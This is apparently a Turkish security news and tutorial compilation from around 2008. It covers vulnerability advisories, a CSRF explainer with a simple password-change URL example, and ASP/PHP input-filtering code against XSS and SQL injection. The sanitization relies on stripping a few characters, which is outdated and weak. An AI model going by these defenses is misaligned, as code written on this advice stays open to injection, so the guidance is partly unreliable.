    \\.\I2OExc arayüzüne sağlanan hatalı erişim sayesinde tüm kullanıcılar yazma yetkisi alabiliyor bu sayede birçok dosyaya ulaşım ve değiştirme sağlanabiliyor. Bir diğer açık ise IOCTLs (input output routines) üzerinde bir hafıza taşması kontrolü bulunmadığından potansiyel hafıza taşması saldırılarına açık. Bu sayede de dışarıdan kod çalıştırılabilir.

    Etkiler:
    Güvenlik açığı Windows XP SP2 ve alt sürümlerinin hepsinde ve sunucularda etkili. Windows SP3'te ise bu güvenlik açığı kapatılmış durumda.

    Çözüm:
    Sürücüyü 5.1.2600.5512 sürümüne güncelleştirin.

    Firefox 3'te İlk Güvenlik Açığı

    Geçtiğimiz günlerde Firefox 3 bir rekor denemesi ile birlikte download'a sunulmuştu. Dünya genelinde 7 milyondan fazla indirilmeyle bu rekoru kırdı. Firefox 3'ün çıkmasıyla ilk güvenlik açığının keşfedilmesi pek uzun sürmedi, öyle ki çıktığı gün araştırmacılar Firefox 3 üzerinde ciddi bir güvenlik açığı bulduklarını açıkladılar.

    Açığı bulan Zero Day Initiative'in bildirdiğine göre güvenlik açığı ile kurbanın bilgisayarında dışarıdan kod çalıştırmak mümkün olabiliyor. Bunun için tek yapılması gereken bir site ya da e-postadaki bağlantıya tıklamak.

    Mozilla güvenlik açığı için bir yama çıkarana kadar güvenlik açığı hakkında daha fazla bilgi verilmeyeceği açıklandı. Yama çıktıktan sonra güvenlik açığının detaylarını ZDI'nin sitesinde bulabilirsiniz.

    Etkilenenler:
    Firefox 3
    Firefox 2.0.x

    Ruby'de 7 Kritik Güvenlik Açığı

    Nesne tabanlı programlama dili olan Ruby'de 7 kritik güvenlik açığı tespit edildi. Güvenlik açıkları Ruby'nin web sayfasında kısaca özetlenirken, genellikle dışarıdan kod çalıştırma ve DoS (denial of service) zaafiyetleri üzerinde duruldu. Tüm güvenlik açıkları kapatılıncaya kadar daha fazla bilgi verilmeyeceği belirtildi.

    Etkilenenler:

    * 1.8.4 ve alt versiyonlar
    * 1.8.5-p230 ve alt versiyonlar
    * 1.8.6-p229 ve alt versiyonlar
    * 1.8.7-p21 ve alt versiyonlar
    * 1.9.0-1 ve alt versiyonlar

    Çözüm:
    Gerekli yükseltmeler Ruby'nin sayfasında mevcut. Ayrıca bu yükseltmeler ile birlikte WEBrick'te bulunan bir güvenlik açığıda kapatılıyor.

    Ruby'de 7 Kritik Güvenlik Açığı

    Nesne tabanlı programlama dili olan Ruby'de 7 kritik güvenlik açığı tespit edildi. Güvenlik açıkları Ruby'nin web sayfasında kısaca özetlenirken, genellikle dışarıdan kod çalıştırma ve DoS (denial of service) zaafiyetleri üzerinde duruldu. Tüm güvenlik açıkları kapatılıncaya kadar daha fazla bilgi verilmeyeceği belirtildi.

    Etkilenenler:

    * 1.8.4 ve alt versiyonlar
    * 1.8.5-p230 ve alt versiyonlar
    * 1.8.6-p229 ve alt versiyonlar
    * 1.8.7-p21 ve alt versiyonlar
    * 1.9.0-1 ve alt versiyonlar

    Çözüm:
    Gerekli yükseltmeler Ruby'nin sayfasında mevcut. Ayrıca bu yükseltmeler ile birlikte WEBrick'te bulunan bir güvenlik açığıda kapatılıyor.

    IPB SQL Injection

    Popüler forum yazılımlarından Invision Power Board üzerinde kritik olarak nitelendirilen bir güvenlik açığı tespit edildi. Güvenlik açığı ile hedef site üzerinde SQL Injection saldırıları yapmak mümkün. Bu saldırılar sonucunda ise oturumlar üzerinde kullanıcı hesapları ele geçirilebiliyor ve uzaktan kod çalıştırılabiliyor.

    2.2.x ve 2.3.x sürümleri ve öncesinde etkili olan güvenlik açığı için IPB yöneticileri tarafından tek dosyalı bir yama yayınlandı.

    Etkilenen Sürümler:
    IP.Board 2.2.x ve 2.3.x

    Çözüm:
    Yayınlanan yamayı uygulayın.
    http://forums.invisionpower.com/index.php?showtopic=276512

    Flash Banner'lara Pano Saldırıları

    Son günlerde saldırganlar Flash Banner'lar üzerinden değişik bir saldırı yöntemi geliştirdi. Flash Banner'lara yerleştirilen kodlar ile sizin panonuzda bulunan (clipboard) yani kopyala-yapıştır ile hafızaya aldığınız veriler zararlı bağlantılar ile yer değiştiriyor. Bilgisayar üzerinde sahte antivirüs uyarılarıyla kullanıcıyı endişeye düşüren saldırılar en sonunda kullanıcının zararlı içerik barındıran web sayfasına girmesiyle sonlanıyor.

    Linux, Windows ve Mac ortamlarında aktif olabilen saldırılar sizin sürekli girdiğiniz ve güvenli olduğunu sandığınız sitelerden de gelebilir. Güvenlik uzmanı Aviv Raff saldırıyı göstermek amaçlı zararsız bir demo hazırlamış. Bu demoya girdikten sonra kopyala yapıştır ile panoya kaydettiğiniz bilgiler 'www.evil.com' ile yer değiştiriyor.

    Çözüm:
    Bu saldırıdan kurtulmak için saldırının olduğu tarayıcıyı kapatmalısınız. Etkilenmemek için ise Firefox için Flash Blocker kullanabilirsiniz. Daha ileri bir güvenlik çözümü için uzmanlar çalışmalara devam ediyor.

    Opera Çoklu Güvenlik Açıkları

    Opera web tarayıcısı üzerinde çeşitli güvenlik açıkları tespit edildi. XSS saldırıları, spoofing, bilgi çalma gibi sonuçlara neden olan güvenlik açıkları uzmanlar tarafından kritik olarak nitelendirilmekte.

    Opera'dan yapılan duyuruda temelde 7 güvenlik açığının olduğu belirtildi. Bu açıklardan ilki, Opera üzerinde zararlı kodlarla yapılan bir yükleme ile sistemde hafıza taşmasına dolaysı ile dışarıdan kod çalıştırılmasına yol açıyor.

    İkinci güvenlik problemi frame bulunan web sayfalarıyla alakalı. Zararlı kodlarla, son aylarda iyice artan Frame Saldırısı yapılabiliyor. Üçüncü güvenlik açığı ise tanımlanamayan bir hata yüzünden XSS'e yol açmakta. Aynı şekilde besleme (feed) bölümündeki güvenlik açığı saldırganlar tarafından suistimal edilerek sisteme müdahale edilebiliyor.

    Son güvenlik açığı ise guvenli.org'ta da bulunan URL kontrol mekanizmasının zaafiyetinden kaynaklanıyor. Aslında zararlı olan bir sayfa zararsız gibi gösterilerek kullanıcıya zarar verebiliyor.

    Çözüm:
    Tüm güvenlik açıkları Opera'nın son versiyonu olan 9.52'de kapatılmış durumda. Eğer güncelleme yapmadıysanız, acil olarak yapmanızı öneriyoruz.

    Apple iPhone Çoklu Güvenlik Açığı

    Apple iPhone üzerinde çoklu güvenlik açıkları tespit edildi. Çeşitli zararlı uygulamaların çalıştırılmasıyla tetiklenen güvenlik açıkları sonucu DNS cache zehirlenmesi, TCP bağlantılarının dinlenmesi ve aracın uzaktan kontrolü mümkün olabiliyor.

    Ayrıca acil çağrı üzerindeki bir hata ile giriş kodu bypass edilebilmekte. Bu sayede iPhone'a fiziksel erişim oluşmakta.

    Tüm açıkların kritik olduğunu belirten güvenlik uzmanları, güvenlik açıkları için çıkarılan yama ve yönergelerin mutlaka takip edilmesini ve yeni versiyona güncelleme yapılması gerektiğini belirtti.

    Çözüm:
    iPhone 2.1 sürümüne güncelleme yapınız.

    PhpMyAdmin Güvenlik Açığı

    Popüler MySql yönetim aracı phpMyAdmin'de kritik olarak nitelendirilen bir güvenlik açığı tespit edildi. 2.11.9.0 ve 3.0.0 rc1'e kadar tüm versiyonları etkileyen güvenlik açığı sort_by parametresinde bulunan bir hatadan kaynaklanmakta. Güvenlik açığının tam olarak çalışması için exec fonksiyonunun çağırılması gerekli.

    İlk olarak Norman Hippert tarafından 3.0.0 rc1 versiyonunda keşfedilen güvenlik açığı daha sonra diğer sürümlerde denenmiş ve tüm versiyonlarda etkili olduğu görülmüştü. Güvenlik açığına karşı phpMyAdmin geliştiricileri tarafından 2.11.9.1 ve 3.0.0-rc2 sürümleri yayınlandı ve bir an önce güncelleme yapılması önerildi. Güncelleme yapılana kadar geçici bir çözüm olarak php.ini içerisinden exec fonksiyonu iptal edilebilir.

    Cross Site Request Forgery (CSRF/XSRF)

    Cross-Site Request Forgery

    1. Giriş
    2. Cross-Site Request Forgery Nedir ?
    3. Nerelerde Kullanılır ? Hangi Uygulamalarda CSRF Bulunabilir ?
    4. Nasıl Uygulanır ? (Exploiting)
    5. CSRF (XSRF) ve XSS Arasındaki Bağ ve Farklılıklar
    6. CSRF’den Korunma Yöntemleri

    ------------------------------------------------------------------------------------------

    1. GirişGünümüzde En Yaygın Web Uygulaması Açığı Olan XSS’in Farklı Bir Türevi ve XSS’ide Kaplayan CSRF: Yerine Göre Son Derece Tehlikeli ve Sömürücü Bir Açıktır. Gelin Bu CSRF Nedir Ne Değildir İnceleyelim.

    2. Cross-Site Request Forgery Nedir ?
    Saldırganın Herhangi Bir Web Sayfasına Gömdüğü JS(JavaScript) veya HTML Kodlarıyla Kurbanın Haberi Olmadan Session(Oturum) Bilgilerini Çalması Olayıdır. Tabi Bu Olay Sadece Oturum Bilgilerini Çalmaktan İbaret Değildir. Kurbana Çalıştırttığı Kod Tipine Göre Değişir (En Basiti ve Çok Verilen Bankadan Örnek Para Transferi.). Bu Olayda Kurban Tamamen Habersizdir Yaptığı Tek Şey Saldırganın Gönderdiği Linke Tıklamasıdır. Tıkladığı Sayfada Herhangi Bir İmaj Tagı (

    3. Nerelerde Kullanılır ? Hangi Uygulamalarda CSRF Bulunabilir ?
    Bütün Web Uygulamaları CSRF Saldırılarına Uygundur. (ASP, PHP......)

    4. Nasıl Uygulanır ? (Exploiting)
    Açığı Exploit Etmeye Değinmeden Önce İstemci ve Sunucu Arasındaki Veri Alışverişi Hk. Hazırladığım Alttaki Diyagram’ı Okuyunuz.

    Resim 1



    CSRF Saldırıları Daha Öncedende Dediğim Gibi Kurbanın Haberi Olmadan Yapılır. Buna Çok Basit Bir Örnek Verelim ;

    Herhangi Bir aaa.com Sitesinde Şifre Değiştirme Sayfası Olsun. Link ;
    http://www.aaa.com/sifredegis.php

    Kullanıcı Şifresini Değiştirdiği Zaman ;
    http://www.aaa.com/sifredegis.php?sifrem=123456

    Kullanıcının Yeni Sifresi 123456 Olmuştur. Şimdi Olayı Biraz Daha Açalım. Bknz. Resim 2

    Resim 2

    5. CSRF (XSRF) ve XSS Arasındaki Bağ ve Farklılıklar
    XSS İle CSRF Arasında Fazla Farklılık Yoktur. Zaten CSRF XSS’ide İçine Alan Bir Saldırı Tipidir. XSS Olan Her Yerde CSRF Olması %90’dır.

    6. CSRF’den Korunma Yöntemleri
    - Herhangi Bir İşlem Yapılmadan Önce Kimlik Doğrulaması Yapılmalıdır.

    - GET Yerine POST(2) Kullanılmalı.
    GET Yerine POST Kullanımı Bazen Yeterli Olmayabiliyor. Fakat GET Metoduna Göre Daha Zordur Çünkü GET Metodunda Değişkenler Tamamen Sayfada Yansıtılır ve Saldırganın İşini Kolaylaştırır.

    - URL Rewrite
    Form-tabanlı kimlik doprulama yaparken diğer bir opsiyon da cookie yerine URL rewrite (özellikle bu opsiyon uygulama sunucusu tarafından transparan olarak yapılabiliyorsa) kullanımıdır. Oturum tanımlayıcısını her URL’ye dahil edildiğinde, bu tanımlayıcı arka arkaya yapılan sayfa isteklerinde ayrıştırılıp oturum bilgisini tanımakta kullanılabilir. Fakat çoğu uygulamada bunun uygulanabilmesi büyük bir çalışma gerektirebilmektedir.

    - Yönlendirme
    XSRF saldırılarını HTTP isteğinin yetkili bir kaynaktan gelip gelmediğini kontrol ederek ve yönlendirme kullanarak önleyebilirsiniz. Eğer Referer başlığı yoksa, veya işlemi gerçekleştirmesi gerekmeyen bir sayfa veya site içeriyorsa, yönlendirme kullanıcıyı başka bir sayfaya yönlendirerek ek işlem yapılmasını engelleyebilir.

    if ($_SERVER[’HTTP_REFERER’] != ‘[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] )
    {
    header(”********: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
    exit;
    }
    ?>

    - CAPTCHA
    CAPTCHA implemente etmekde XSRF saldırılarını engelleyebilir. CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) basitçe kullanıcının karışık fakat okunabilir harf (veya harf rakam kombinasyonu) içeren resimde gösterilenleri girmesini gerektirir. Burdaki fikir bilgisayarın grafikte gizli olan kelimeyi bulamayacağı ve insanların kolaylıkla ayırtedebileceğidir. CAPTCHA kullanımı, kullanıcının spesifik işlemler öncesi resimdeki bilgiyi girmesi ile olur. İşleme devam için otomatik bir script’in yaratılması çok zor olsa da bunu aşma konusunda araştırmalar yapılıyor. Eğer bu metodu kullanmaya karar verirseniz güçlü bir CAPTCHA kullanın. Güçlü bir CAPTCHA inşa etmek zor olabilir. Ek olarak, resimlerin bilgisayar tarafından okunamadığına emin olmak için, geliştiricilerin, CAPTCHA’nın script seviyesinde atlatılamayacağına emin olması gerekir. Aynı CAPTCHA birden fazla mı kullanılıyor? uygulamanın tekrar-oynatma (replay) saldırısından etkilenmesine yol açarmı? Ya da CAPTCHA ya geçirilen düz yazı cevap web formunun bir parçasımı? Bunlar düşünülmesi gereken problemler.

    - Kullanıcıların Yapabileceği Bazı Yöntemlerde Vardır. Cookie’lerinizi Her Oturum Sonunda Temizleyiniz.

    Not : Korunma Yöntemleri Alıntıdır. Diğer Bilgiler Kendi Anlatımımdır.




    (1)GET
    Bir Login (Giriş) Sayfası Ele Alalım Kullanıcı Adı ve Şifreden Oluşsun.. GET Yöntemi Form’u Karşı Tarafa Gönderirken; Gönderilen Bilgiler Adres Satırında Açıkça Görüntülenir.. Örneğin Kullanıcı Adı Ve Şifrenizi Girdiğiniz Zaman Form’a Girdiğiniz Bilgiler Adres Satırında veya Kodlanmada Nereye Yönlendirilmişse Orada Görüntülenir

    (2)POst
    STPOST Yöntemi İse Form’u Karşı Tarafa Gönderirken Bilgiler Adres Satırında Görüntülenmez.

    Bu İki Farkı Ele Alalım ;
    Kullanıcı Adı ve Şifre Girdiğiniz Bir Web Sayfasını Karşıya Gönderiken Girmiş Olduğunuz Bilgilerin Adres Satırında (veya Kodlamada Nereye Yönlendirilmişse) Görünmesi Olayına GET Yöntemi Denir. POST Yönteminde Girilen Bilgiler Karşı Tarafa Yine Gönderilir Fakat Bir Fark Var Adres Satırında Girdiğiniz Bilgiler Değil Sadece Standart URL (Link) Görüntülenir.

    XSS & SQL İnjection`lardan Korunma

    İçerik :

    1.Giriş
    2.Xss ve Sql’e Bakış
    3.Korunma
    4.Çıkış

    ================================================== ===============================================

    [1.Giriş]
    ’’’’’’’’’
    -------------------------------------------------------------------------------------------------

    Sql Injection Ve Xss Ataklarını Bir Önceki Derslerimizde Anlatmıştım...Şimdiki Konuda Bun
    lardan Nasıl Korunacağımıza Göz Atacağız. Bu Konuyu Okumadan Önce

    Sql Injection Nedir?
    Xss Nedir?

    Konularını Okumanızı, Örnekleri Incelemenizi Mutlak Tavsiye Ederim. Girişi Fazla Uzatmadan Şimdi
    Konumuza Dönelim...

    [2.Xss Ve Sql’e Bakış]
    -------------------------------------------------------------------------------------------------

    Her Iki Atak Türününde Uygulanması, Dışarıdan Eklenen Kodlar Ile Olduğunu Önceki Konuları
    mızda Belirttik.Ve Uygulamalı Olarak Inceledik. Şimdi Buradan Yola Cikarak Nasil Korunacağımıza
    Bakacağız.

    SQL Injection İçin : ’ Karakteri.
    Xss Icın : < ; : ( ) Karakterleri.

    Bu Karakterler Sql’de ve html’de İşlevi Olan Karakterlerdir. Biz Bu Atak Türlerine Engel Olabilm
    ek İçin Bu Karakterleri Tüm Gelen Veriler İçerisinde Kontrol Etmeliyiz. Ve Daha Sonra Script İçe
    risinde Kullanmalıyız.
    Bu Karakterleri Gelen Datalar İçerisinde Var Olup Olmadiklarini Kontrol Edip , Daha Sonraa İşlem
    Yaptırırsak Korunmuş Oluruz.

    [3.Korunma]
    -------------------------------------------------------------------------------------------------

    Genel Olarak Asp ve Php Dillerinden Yola Cikarak Bu Atakları Blocklama Yollarını Acıklaya
    cağım.Burada Ek Olarak "Tsm Atak Block" Modulunude Örnekle Tanımış Olup,Kullanımı Hakkında Bilgi
    sahibi Olacaksınız...
    Genel Bir Asp Dosyası İçerinde Yapılacak Kontrol.

    Burada Tümünde:
    adi, soyadi Değişkenlerinin olduğunu varsayiyorum.

    Asp:
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    ================================================== ===============================================
    <%

    adi = Request.QueryString("adi")
    soyadi = Request.QueryString("soyadi")

    adi = replace(adi,"’","")
    adi = replace(adi,"(","")
    adi = replace(adi,")","")
    adi = replace(adi,";","")
    adi = replace(adi,":","")
    adi = replace(adi,"<","")

    soyadi = replace(soyadi,"’","")
    soyadi = replace(soyadi,"(","")
    soyadi = replace(soyadi,")","")
    soyadi = replace(soyadi,";","")
    soyadi = replace(soyadi,":","")
    soyadi = replace(soyadi,"<","")

    reponse.write adi & "
    " & soyadi

    ?>
    ================================================== ===============================================
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    Şeklindeki Bir Asp Dosyasına, Adi Olarak Yollanacak Değer Alttaki Gibi Olursa:

    test.asp?adi=ibrahim

    Çıktısı Şu Şekli Alacaktır.

    --------------------------------
    ibrahimscript>alerttest/script>
    ---------------------------------

    yani Burada Yaptiğimiz replace(değiştirme) İşleminde Görmüş Olduğunuz Gibi ’,<,;,:,(,) Karakterl
    erini boş olarak değiştirdi.Eğer Böyle Bir İşlem Yapmiş Olmasaydik ( değiştirme ) Çıktı Şu Şekil
    de Olacaktı.

    --------------------------------
    ibrahim
    ---------------------------------
    Buda Script Tarafından script tagindan Yorumlanarak, Size Uyarı Mesaji Verecekti. Yani Burada Uy
    arı Yerine, Xss ve Sniffer Derslerimizde Gördüğümüz Gibi Dilediğimiz Scripti Caliştirmak Müm kün
    Olurdu...

    Şimdi Php İle BUnları Nasil Yapacağımıza Bakalım...

    PHP
    ################################################## ###############################################
    ================================================== ===============================================

    $adi = $_GET["adi"];
    $soyadi = $_GET["soyadi"];

    $adi = str_replace("’","",$adi);
    $adi = str_replace("(","",$adi);
    $adi = str_replace(")","",$adi);
    $adi = str_replace(";","",$adi);
    $adi = str_replace(":","",$adi);
    $adi = str_replace("<","",$adi);

    $soyadi = str_replace("’","",$soyadi);
    $soyadi = str_replace("(","",$soyadi);
    $soyadi = str_replace(")","",$soyadi);
    $soyadi = str_replace(";","",$soyadi);
    $soyadi = str_replace(":","",$soyadi);
    $soyadi = str_replace("<","",$soyadi);

    echo $adi."
    ".$soyadi;

    ?>
    ================================================== ===============================================
    ################################################## ###############################################

    Şeklindeki Bir PHP Dosyasına, Adi Olarak Yollanacak Değer Alttaki Gibi Olursa:

    test.php?adi=ibrahim

    Çıktısı Şu Şekli Alacaktır.

    --------------------------------
    ibrahimscript>alerttest/script>
    ---------------------------------

    yani Burada Yaptiğimiz str_replace(string değiştirme) İşleminde Görmüş Olduğunuz Gibi ’,<,;,:,(,)
    Karakterlerini boş olarak değiştirdi.Eğer Böyle Bir İşlem Yapmiş Olmasaydik ( değiştirme ) Çıktı
    Şu Şekilde Olacaktı.

    --------------------------------
    ibrahim
    ---------------------------------

    Buda Script Tarafından script tagindan Yorumlanarak, Size Uyarı Mesaji Verecekti. Yani Burada Uy
    arı Yerine , Xss ve Sniffer Derslerimizde Gördüğümüz Gibi Dilediğimiz Scripti Caliştirmak Mümkün
    Olurdu...

    Şimdi Php Dosyalarımız İçin Ek Olarak Bir Bilgi Vermek Gerekirse, Sunucu Üzerindeki Konfürigrasy
    onda php.ini içerisinde

    magic_quotes_sybase = On

    ve

    magic_quotes_runtime = on

    Şeklinde Ise, ’ Karakteri Zaten Etkisiz Kalacaktır. Php "\\\\" Kapaniş Karakteri Her ’ Karakterini
    Kendisiyle Birlikte Replace Edecektir. Fakat Bu Xss İçin Bi Engel Değildir.Ve Genel Anlamda Ser
    ver Sahibi Bazı Scriptlerin Hatasız Calişması İçin Acmış Olabilir.

    Biz Her İhtimale Karşılık Olarak Bu Kontrolleri Yaptirmalıyız.Bu Her Değişken İçin Çok Uzun Sür
    ebilir. veya Çok Kod Demektir.Biz Sizler İçin Bir Modul Hazırladık, Bunu Kullanmış Olduğunuz Se
    rver’a register Ettirip Ücretsiz Olarak Kullanabilirsiniz.

    Register Edilmiş Server Üzerinde "TSM Atak Block" Nasıl Kullanılır Şimdi Buna Göz Atalım...


    ASP
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    ================================================== ===============================================
    <%
    adi = Request.QueryString("adi")
    soyadi = Request.QueryString("soyadi")
    set Kontrol = CreateObject("TsmAtak.Block")

    reponse.write Kontrol.GelenKontrol(adi) & "
    " & Kontrol.GelenKontrol(soyadi)

    %>
    ================================================== ===============================================
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    Modulumuzu Script İçinde Tanimlayip, Tüm İcerideki Değişkenleri Modul İçinde Filtre Ederek
    Tüm Gelen Verileri Kontrol Ettirebilirsiniz.Bu Hem Az Kod Hemde Daha İyi Bir Güvenlik Demektir.
    Yukarıdaki İlk Örneğimizdeki Kod Satır Sayısı İle Modul Filtredeki Kod Satır Sayısı Arasındaki Fa
    rkı Görmüş Olmalısını...
    Şimdi birde Php İçin Örneğimize Bakalım.


    ################################################## ###############################################
    ================================================== ===============================================
    $adi = $_GET["adi"];
    $soyadi = $_GET["soyadi"];
    $kontrol = new COM("TSMAtak.Block");


    echo $kontrol->GelenKontrol($adi)."
    ".$kontrol->GelenKontrol($soyadi);

    ?>
    ================================================== ===============================================
    ################################################## ###############################################

    ================================================== ===============================================

    Mobil Cihazlarda Botnet Tehlikesi

    "Acil Siber Güvenlik Tehditleri" isimli güvenlik konferansı geçtiğimiz günlerde Amerika Birleşik Devletleri'nin Georgia eyaletinde düzenlendi. Bir çok güvenlik uzmanı ve araştırmacının katıldığı konferansta 2009'da hackerların mobil cihazları ve mobil ağları botnet saldırılarında kullanabileceğine dikkat çekildi. GaTech'ten katılan uzman konuşmacı ayrıca cep telefonlarında saklanan bilgilerinde tehdit altında olduğunu söyledi.

    Japonya'da başlatılan yeni sistemle cep telefonu kullanıcıları cep telefonlarıyla birlikte ödemelerini yapabiliyor hatta ulaşım için cep telefonları üzerinden bilet alabiliyorlar. Uzmanlar, mobil cihazlarda güvenliğin şimdilik ön planda olmadığını bunun en büyük sebebinin de antivirüs yazılımlarının, mobil cihazlardaki batarya problemleri nedeniyle cep telefonları ve akıllı telefonlara yönelmemesini olduğu söyleniyor.

    Dikkat çekilen bir başka hususta gelecekte VoIP operatörleri üzerinden saldırıların artmasının beklendiği. VoIP ağlarına yapılan saldırıların kesilmesi için yöneticilerinden zorla para sızdırılması önümüzdeki bir kaç yıl içerisinde ciddi bir problem olarak görülüyor.

    Popüler Sitelerde CSRF Saldırıları

    Daha önce cross-site saldırıları ve güvenlik sanatı yazısında belirttiğimiz gibi CSRF (Cross-Site Request Forgery) saldırıları her geçen gün daha tehlikeli hale gelmekte. Özellikle arama formları, üyelik sistemleri gibi istek gönderen bölümlere sahip dinamik sayfalarda yapılan sahte (forge) istekler CSRF zaafiyetlerinin oluşmasına neden oluyor.

    Bir grup güvenlik araştırmacısı bu tehlikeyi göstermek için 4 çok büyük ve popüler web sitesinde CSRF zaafiyetlerinin olduğunu gösterdi.

    1. Youtube (youtube.com)
    Durum: Düzeltildi.
    Popüler video paylaşım sitesi Youtube'ta CSRF saldırılarıyla bir kişinin kendisini başka bir kullanıcının arkadaş listesine ya da bir videoyu yine başka bir kullanıcının favorileri arasına eklemesi mümkün. Dahası yine bir kullanıcının hesabı ile başkalarına mesaj atılabiliyor.

    2. ING Direct (ingdirect.com)
    Durum: Düzeltildi.
    Dünyaca ünlü ING Bankasının bir servisi olan IngDirect'te CSRF saldırılarıyla ek hesaplar yaratmak ve hesaplar arası transferler yapmak mümkün.

    3. Metafilter (metafilter.com)
    Durum: Düzeltildi.
    Popüler weblog servisi Metafilter'da CSRF saldırılarıyla bir kullanıcı hesabı tamamen kontrol edilebilmekte. Ayrıca "şifremi unuttum" fonksiyonu ile kullanıcı şifresi saldırganın e-posta adresine gönderilebilmekte.

    'İzlendiğinizin Farkındayken Tadını Çıkartın'

    Güvenlik uzmanı Bruce Schneier kendi web günlüğünde, izleme teknlolojilerinin gitgide daha önemli, küçük ve tespit edilmesi zor bir hale gelmesine karşı 'hala izlendiğinizin farkındayken bunun tadını çıkartın' diyerek uyarıda bulundu. Schneier uyarısına, '5 yıl önce etrafta hiç güvenlik kameraları yoktu, şimdi ise her yerdeler fakat hala gözlerimizle görebiliyoruz, 5 yıl sonra sayıları çok ciddi bir şekilde artacak fakat bu sefer onları göremeyeceğiz." şeklinde devam etti.

    Kameraların sadece basit bir örnek olduğunu belirten Schneier gelecekte insanlığı bekleyen izlenme kâbusunun hayatımızın her yerine hatta cüzdanlarımızın içine gireceğini ekledi. Radyo Frekansları ile Tanılama (RFID) teknolojisi ile kimliklerimize eklenen çipler bizim her saniye nerede olduğumuzu hatta neler yaptığımızı rapor edebilecek. Biyometrik teknolojiler ile yüz tanılama olağan hale gelecek, cep telefonları hatta elbiselere eklenen özel çiplerle bile kimlik tespiti yapılabilecek.

    Bunların yanında bu izlenme çılgınlığı hava alanlarında beklemeye gerek kalmadan üzerimizdeki çiplerle giriş yapabilme gibi kolaylıklar da sağlayacak. Öte yandan kimliklerin kırılıp kopyalanması ile de güvenlik sağlama amaçlı bu sistem tamamen bir güvenlik açığı haline dönüşebilecek.

    İngiltere, geçtiğimiz günlerde bu tip kimlik tanılama sistemlerine yavaş yavaç geçmeye başladı. Ulusal kimlik kartları ve ehliyetlerde başlatılan uygulamanın bir kaç yıl içerisinde tüm ülkede yaygınlaşması hedefleniyor.

    Joomla XSS Güvenlik Açığı

    İçerik yönetim sistemi Joomla'da iki yeni güvenlik açığı tespit edildi. Joomla güvenlik bülteninde bildirilen güvenlik açıklarından ilki com_content içerik gönderimi sırasında tehlikeli HTML etiketlerinin filtrelenmemesinden kaynaklanıyor. Güvenlik açığı, yazar ve üstü kullanıcı seviyelerinin içerik göndermesi sırasında oluşabilmekte. Joomla 1.5.7 ve altı versiyonlar bu güvenlik açığından etkileniyor.

    Benzer bir güvenlik açığı ise com_weblinks'te bağlantı gönderilirken başlık ve açıklamaya tehlikeli HTML etiketleri eklenmesiyle oluşmakta. Aynı şekilde bu güvenlik açığı da 1.5.7 ve altı versiyonlarda mevcut. İki güvenlik açığı da cross-site script (XSS) yöntemi ile etkili oluyor.

    Çözüm:
    1.5.8 (şuanki son sürüm) ya da üstü bir versiyona güncelleme yapınız.

    Firefox'ta Eklenti Gibi Gizlenen Trojan

    Popüler internet tarayıcısı Firefox'un başı bugünlerde kendini eklenti gibi tanıtan bir trojanla dertte. BitDefender'ın yaptığı uyarıya göre ChromeInject-A tipi trojan Windows işletim sistemlerine girdikten sonra eğer bilgisayarda Firefox varsa kendini Firefox'un eklentileri içine atıyor ve Firefox her açıldığında aktif oluyor. Trojan'ın asıl hedefi ise özellikle Avrupa ve Amerika'da ki kullanıcıların banka hesapları.

    Trojan, aldığı bilgileri Rusya'da bir istemciye gönderiyor. Bu da trojanın yazarının Rusya'da biri olduğunu gösteriyor. Güvenlik uzmanları bu trojanın henüz fazla yaygınlaşmadığını fakat etkisinin çok büyük olabileceğini söyledi. Güvenliğiniz için Firefox eklenti klasörünün içerisinde kullanmadığınız dosyalar olup olmadığını kontrol ediniz.

    Daha detaylı bilgi: http://www.bitdefender.com/VIRUS-1000451-en--Trojan.PWS.ChromeInject.B.h...

    21 Milyon Banka Hesabı Çalındı

    Bir Alman dergisinde belirtilen habere göre, Alman bankalarından 21 milyon kişinin banka hesapları çalındı ve 12 milyon euro karşılığında banka hesap detayları black market olarak tabir edilen internet sitelerinde satışa sunuldu. Dergiden 2 kişi olayı araştırmak için alıcı rolü yaparak hacker'larla irtibat kurdular. Hacker'lar blöf yapmadıklarını kanıtlamak için 1.2 milyon hesabın isim, adres, telefon ve doğum günü bilgilerini içeren bir CD'yi alıcılara verdiler.

    Banka hesap şifrelerinin bulunmadığı hırsızlık olayında hacker'lar doğrudan banka hesap numaralarına ulaşamıyor. Yine de scam olarak tabir edilen dolandırıcılık yöntemiyle bir çok bankadan bu bilgilerle rant elde edilebilir.

    Bu olay son aylarda Almanya'da yaşanan 2. büyük banka hesap soygunu. Yine bir kaç ay önce Almanya'da 17 milyon banka hesabı bulunan bir veri aleti çalınmıştı.

    Phishing'ten Korunmak İçin Firefox

    Phishing'ten korunmak için Firefox'mu IE mi?

    * Bu yazıda phishing'in ne olduğunu bildiğiniz varsayılmıştır.

    Phishing'ten korunmak için çeşitli software'ler dışında web tarayıcının büyük önemi vardır. 'Plug-in' (eklenti) desteği sayesinde firefox İE'yi geride bırakıyor.

    Şimdi güvenlik açısından yararlı firefox plug-in'lerini tanıyalım.

    1) McAfee Site Advisor :

    Girdiğiniz adresler hakkında güvenlik derecelendirmeleri yapabilen bir programdır.

    Programın resmi sitesi : http://www.siteadvisor.com/

    Resimde gördüğünüz üzere 3 çeşit tanımlama vardır. Çoğunluk olarak 'tanımlanmamış' sitelere rastlamazsınız. Şimdi şüpheli görünen site hakkında bilgi almak için 'X' butonuna basalım.

    Site hakkında analiz :

    Bu plug-in'i browser'imize yüklemek için download adresine girip sağdaki bölümden yüklemeyi başlatabiliriz. Yüklemeden sonra plug-in'in etkinleşmesi için firefox'u açıp kapatmanız gerekiyor.

